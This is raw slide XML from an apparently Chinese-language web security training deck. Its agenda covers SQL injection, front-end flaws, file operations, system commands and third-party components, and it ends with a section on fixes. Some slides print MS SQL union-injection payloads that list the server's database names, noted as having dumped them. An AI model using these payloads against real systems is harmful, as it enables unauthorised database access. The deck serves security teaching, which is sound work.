                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>2'+union+SELECT+top+1+Name+FROM+Master..SysDatabases--</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sz="1800" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFillTx/>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1731532" y="1928965"/>
            <a:ext cx="8647619" cy="2447619"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1664857" y="3871822"/>
            <a:ext cx="3590476" cy="1009524"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="文本框 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5514975" y="3871822"/>
            <a:ext cx="5495925" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>2'+union+SELECT+Name+FROM+Master..SysDatabases--</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1572355" y="5128997"/>
            <a:ext cx="9974799" cy="1309904"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="101438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731532" y="277029"/>
            <a:ext cx="8911976" cy="1292662"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>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zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>爆库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>到了数据库中所有数据库名。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFillTx/>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7827829" y="923360"/>
            <a:ext cx="2815679" cy="5577798"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3840610" y="2243545"/>
            <a:ext cx="3523809" cy="2409524"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="470584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p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1731532" y="202558"/>
            <a:ext cx="6884754" cy="584777"/>
            <a:chOff x="207532" y="202557"/>
            <a:chExt cx="6884754" cy="584777"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="文本框 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="394298" y="202557"/>
              <a:ext cx="758165" cy="584777"/>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a:solidFill>
                    <a:srgbClr val="284360"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Unicode MS" pitchFamily="34"/>
                  <a:ea typeface="Arial Unicode MS" pitchFamily="34"/>
                  <a:cs typeface="Arial Unicode MS" pitchFamily="34"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4"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zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="284360"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Unicode MS" pitchFamily="34"/>
                  <a:ea typeface="Arial Unicode MS" pitchFamily="34"/>
                  <a:cs typeface="Arial Unicode MS" pitchFamily="34"/>
                </a:rPr>
                <a:t>背景知识</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="284360"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34"/>
                <a:ea typeface="Arial Unicode MS" pitchFamily="34"/>
                <a:cs typeface="Arial Unicode MS" pitchFamily="34"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="组合 20"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="207532" y="454200"/>
              <a:ext cx="213311" cy="81492"/>
              <a:chOff x="207532" y="454200"/>
              <a:chExt cx="213311" cy="81492"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="6"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7"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8" name="组合 21"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1123569" y="454200"/>
              <a:ext cx="213302" cy="81492"/>
              <a:chOff x="1123569" y="454200"/>
              <a:chExt cx="213302" cy="81492"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="9"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10"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="组合 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1731532" y="1038978"/>
            <a:ext cx="6884754" cy="584777"/>
            <a:chOff x="207532" y="202557"/>
            <a:chExt cx="6884754" cy="584777"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="文本框 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="394298" y="202557"/>
              <a:ext cx="758165" cy="584777"/>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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="284360"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Unicode MS" pitchFamily="34"/>
                  <a:ea typeface="Arial Unicode MS" pitchFamily="34"/>
                  <a:cs typeface="Arial Unicode MS" pitchFamily="34"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="284360"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34"/>
                <a:ea typeface="Arial Unicode MS" pitchFamily="34"/>
                <a:cs typeface="Arial Unicode MS" pitchFamily="34"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15"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zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="284360"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Unicode MS" pitchFamily="34"/>
                  <a:ea typeface="Arial Unicode MS" pitchFamily="34"/>
                  <a:cs typeface="Arial Unicode MS" pitchFamily="34"/>
                </a:rPr>
                <a:t>最便捷的“脱裤”方式</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="284360"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Unicode MS" pitchFamily="34"/>
                  <a:ea typeface="Arial Unicode MS" pitchFamily="34"/>
                  <a:cs typeface="Arial Unicode MS" pitchFamily="34"/>
                </a:rPr>
                <a:t>SQL</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="284360"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Unicode MS" pitchFamily="34"/>
                  <a:ea typeface="Arial Unicode MS" pitchFamily="34"/>
                  <a:cs typeface="Arial Unicode MS" pitchFamily="34"/>
                </a:rPr>
                <a:t>注入</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="284360"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34"/>
                <a:ea typeface="Arial Unicode MS" pitchFamily="34"/>
                <a:cs typeface="Arial Unicode MS" pitchFamily="34"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="16" name="组合 20"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="207532" y="454200"/>
              <a:ext cx="213311" cy="81492"/>
              <a:chOff x="207532" y="454200"/>
              <a:chExt cx="213311" cy="81492"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="20"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21"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17" name="组合 21"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1123569" y="454200"/>
              <a:ext cx="213302" cy="81492"/>
              <a:chOff x="1123569" y="454200"/>
              <a:chExt cx="213302" cy="81492"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="18"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19"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="组合 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1731532" y="1834652"/>
            <a:ext cx="6884754" cy="584777"/>
            <a:chOff x="207532" y="202557"/>
            <a:chExt cx="6884754" cy="584777"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="文本框 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="394298" y="202557"/>
              <a:ext cx="758165" cy="584777"/>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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="284360"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Unicode MS" pitchFamily="34"/>
                  <a:ea typeface="Arial Unicode MS" pitchFamily="34"/>
                  <a:cs typeface="Arial Unicode MS" pitchFamily="34"/>
                </a:rPr>
                <a:t>3</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="284360"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34"/>
                <a:ea typeface="Arial Unicode MS" pitchFamily="34"/>
                <a:cs typeface="Arial Unicode MS" pitchFamily="34"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24"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不可小觑的</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN"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 WEB </a:t>
              </a:r>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前端安全漏洞</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="25" name="组合 20"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="207532" y="454200"/>
              <a:ext cx="213311" cy="81492"/>
              <a:chOff x="207532" y="454200"/>
              <a:chExt cx="213311" cy="81492"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="29"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30"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26" name="组合 21"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1123569" y="454200"/>
              <a:ext cx="213302" cy="81492"/>
              <a:chOff x="1123569" y="454200"/>
              <a:chExt cx="213302" cy="81492"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="27"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28"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31" name="组合 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1731532" y="2634126"/>
            <a:ext cx="6884754" cy="584775"/>
            <a:chOff x="207532" y="202557"/>
            <a:chExt cx="6884754" cy="584775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="文本框 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="394298" y="202557"/>
              <a:ext cx="758165" cy="584775"/>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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="284360"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Unicode MS" pitchFamily="34"/>
                  <a:ea typeface="Arial Unicode MS" pitchFamily="34"/>
                  <a:cs typeface="Arial Unicode MS" pitchFamily="34"/>
                </a:rPr>
                <a:t>4</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="284360"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34"/>
                <a:ea typeface="Arial Unicode MS" pitchFamily="34"/>
                <a:cs typeface="Arial Unicode MS" pitchFamily="34"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33"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致命的文件操作</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="34" name="组合 20"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="207532" y="454200"/>
              <a:ext cx="213311" cy="81492"/>
              <a:chOff x="207532" y="454200"/>
              <a:chExt cx="213311" cy="81492"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="38"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39"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35" name="组合 21"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1123569" y="454200"/>
              <a:ext cx="213302" cy="81492"/>
              <a:chOff x="1123569" y="454200"/>
              <a:chExt cx="213302" cy="81492"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="36"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37"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="40" name="组合 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1731532" y="3392853"/>
            <a:ext cx="6884754" cy="584775"/>
            <a:chOff x="207532" y="202557"/>
            <a:chExt cx="6884754" cy="584775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="文本框 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="394298" y="202557"/>
              <a:ext cx="758165" cy="584775"/>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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="284360"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Unicode MS" pitchFamily="34"/>
                  <a:ea typeface="Arial Unicode MS" pitchFamily="34"/>
                  <a:cs typeface="Arial Unicode MS" pitchFamily="34"/>
                </a:rPr>
                <a:t>5</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="284360"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34"/>
                <a:ea typeface="Arial Unicode MS" pitchFamily="34"/>
                <a:cs typeface="Arial Unicode MS" pitchFamily="34"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42"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危险的系统命令</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="43" name="组合 20"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="207532" y="454200"/>
              <a:ext cx="213311" cy="81492"/>
              <a:chOff x="207532" y="454200"/>
              <a:chExt cx="213311" cy="81492"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="47"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48"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44" name="组合 21"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1123569" y="454200"/>
              <a:ext cx="213302" cy="81492"/>
              <a:chOff x="1123569" y="454200"/>
              <a:chExt cx="213302" cy="81492"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="45"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46"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="49" name="组合 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1731532" y="4997844"/>
            <a:ext cx="6884754" cy="584775"/>
            <a:chOff x="207532" y="202557"/>
            <a:chExt cx="6884754" cy="584775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="文本框 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="394298" y="202557"/>
              <a:ext cx="758165" cy="584775"/>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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="284360"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Unicode MS" pitchFamily="34"/>
                  <a:ea typeface="Arial Unicode MS" pitchFamily="34"/>
                  <a:cs typeface="Arial Unicode MS" pitchFamily="34"/>
                </a:rPr>
                <a:t>7</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="284360"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34"/>
                <a:ea typeface="Arial Unicode MS" pitchFamily="34"/>
                <a:cs typeface="Arial Unicode MS" pitchFamily="34"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51"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r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="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其他漏洞</a:t>
              </a:r>
              <a:endPar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52" name="组合 20"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="207532" y="454200"/>
              <a:ext cx="213311" cy="81492"/>
              <a:chOff x="207532" y="454200"/>
              <a:chExt cx="213311" cy="81492"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="56"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57"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53" name="组合 21"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1123569" y="454200"/>
              <a:ext cx="213302" cy="81492"/>
              <a:chOff x="1123569" y="454200"/>
              <a:chExt cx="213302" cy="81492"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="54"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55"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="58" name="组合 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1731532" y="4172508"/>
            <a:ext cx="6884754" cy="584775"/>
            <a:chOff x="207532" y="202557"/>
            <a:chExt cx="6884754" cy="584775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="59" name="文本框 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="394298" y="202557"/>
              <a:ext cx="758165" cy="584775"/>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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="284360"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Unicode MS" pitchFamily="34"/>
                  <a:ea typeface="Arial Unicode MS" pitchFamily="34"/>
                  <a:cs typeface="Arial Unicode MS" pitchFamily="34"/>
                </a:rPr>
                <a:t>6</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="284360"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34"/>
                <a:ea typeface="Arial Unicode MS" pitchFamily="34"/>
                <a:cs typeface="Arial Unicode MS" pitchFamily="34"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="60"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r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="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躺</a:t>
              </a:r>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枪的第三方组件</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="61" name="组合 20"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="207532" y="454200"/>
              <a:ext cx="213311" cy="81492"/>
              <a:chOff x="207532" y="454200"/>
              <a:chExt cx="213311" cy="81492"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="65"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66"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62" name="组合 21"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1123569" y="454200"/>
              <a:ext cx="213302" cy="81492"/>
              <a:chOff x="1123569" y="454200"/>
              <a:chExt cx="213302" cy="81492"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="63"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64"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="67" name="组合 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1731532" y="5813328"/>
            <a:ext cx="6884754" cy="584777"/>
            <a:chOff x="207532" y="202557"/>
            <a:chExt cx="6884754" cy="584777"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="68" name="文本框 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="394298" y="202557"/>
              <a:ext cx="758165" cy="584777"/>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08</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="284360"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34"/>
                <a:ea typeface="Arial Unicode MS" pitchFamily="34"/>
                <a:cs typeface="Arial Unicode MS" pitchFamily="34"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="69" name="文本框 5"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1520546" y="264115"/>
              <a:ext cx="5571740" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="flat">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0" compatLnSpc="1">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>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如何填坑</a:t>
              </a:r>
